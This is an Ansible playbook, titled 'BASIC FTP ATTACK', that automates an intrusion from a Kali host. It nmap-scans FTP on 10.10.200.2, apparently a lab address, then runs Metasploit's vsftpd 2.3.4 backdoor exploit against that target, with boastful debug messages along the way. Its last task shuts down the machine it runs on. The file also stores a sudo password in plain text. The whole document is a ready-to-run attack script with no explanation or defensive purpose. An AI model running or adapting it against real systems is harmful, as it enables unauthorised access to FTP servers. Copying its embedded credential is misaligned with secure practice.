---
- name: BASIC FTP ATTACK
  hosts: thx_kali
  become: yes
  gather_facts: no
  vars:
    ansible_become_password: "Secure.00" 
  tasks:
    - name: CHECKING SERVICE STATUS
      command: >
        nmap -sV -p21 -sC -A 10.10.200.2
      register: result1
      ignore_errors: yes

    - name: Process CHECKING SERVICE STATUS
      block:
        - name: SUCCESS 1
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout if result1.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT CHECKING SERVICE STATUS
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr if result1.stderr is defined else 'No stderr available' }}"
        - name: STOPPED
          fail:
            msg: "Stopping playbook due to command 1 failure."

    - name: STARTING METASPLOIT CONSOLE
      command: >
        msfconsole -q -x 'exit'
      register: result2
      ignore_errors: yes

    - name: Process STARTING METASPLOIT CONSOLE
      block:
        - name: SUCCESS 2
          debug:
            msg: "ITS STARTED LETS GO MAN: {{ result2.stdout if result2.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT METASPLOIT CONSOLE
          debug:
            msg: "OKAY !! NO WAY: {{ result2.stderr if result2.stderr is defined else 'No stderr available' }}"

    - name: SEARCH VSFTP EXPLOIT
      command: msfconsole -q -x 'search vsftp; exit'
      register: result3
      ignore_errors: yes

    - name: Process SEARCH VSFTP EXPLOIT
      block:
        - name: SUCCESS 3
          debug:
            msg: "GUNS ARE HERE LETS GO MAN: {{ result3.stdout if result3.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT VSFTP EXPLOIT SEARCH
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr if result3.stderr is defined else 'No stderr available' }}"

    - name: SELECT EXPLOIT
      command: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; exit'
      register: result4
      ignore_errors: yes

    - name: Process SELECT EXPLOIT
      block:
        - name: SUCCESS 4
          debug:
            msg: "BULLET IN LETS GO MAN: {{ result4.stdout if result4.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT SELECT EXPLOIT
          debug:
            msg: "OKAY !! NO WAY: {{ result4.stderr if result4.stderr is defined else 'No stderr available' }}"

    - name: SET RHOST
      command: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 10.10.200.2; exit'
      register: result5
      ignore_errors: yes

    - name: Process SET RHOST
      block:
        - name: SUCCESS 5
          debug:
            msg: "IN TARGET LETS GO MAN: {{ result5.stdout if result5.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT SET RHOST
          debug:
            msg: "OKAY !! NO WAY: {{ result5.stderr if result5.stderr is defined else 'No stderr available' }}"

    - name: RUN EXPLOIT
      command: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 10.10.200.2; exploit; exit'
      register: result6
      ignore_errors: yes

    - name: Process RUN EXPLOIT
      block:
        - name: SUCCESS 6
          debug:
            msg: "SHOOTS FIRED LETS GO MAN: {{ result6.stdout if result6.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT RUN EXPLOIT
          debug:
            msg: "OKAY !! NO WAY: {{ result6.stderr if result6.stderr is defined else 'No stderr available' }}"

    - name: SHUTDOWN SYSTEM
      command: poweroff
      register: result7
      ignore_errors: yes

    - name: Process SHUTDOWN SYSTEM
      block:
        - name: SUCCESS 7
          debug:
            msg: "SYSTEM SHUTDOWN: {{ result7.stdout if result7.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT SHUTDOWN SYSTEM
          debug:
            msg: "OKAY !! NO WAY: {{ result7.stderr if result7.stderr is defined else 'No stderr available' }}"
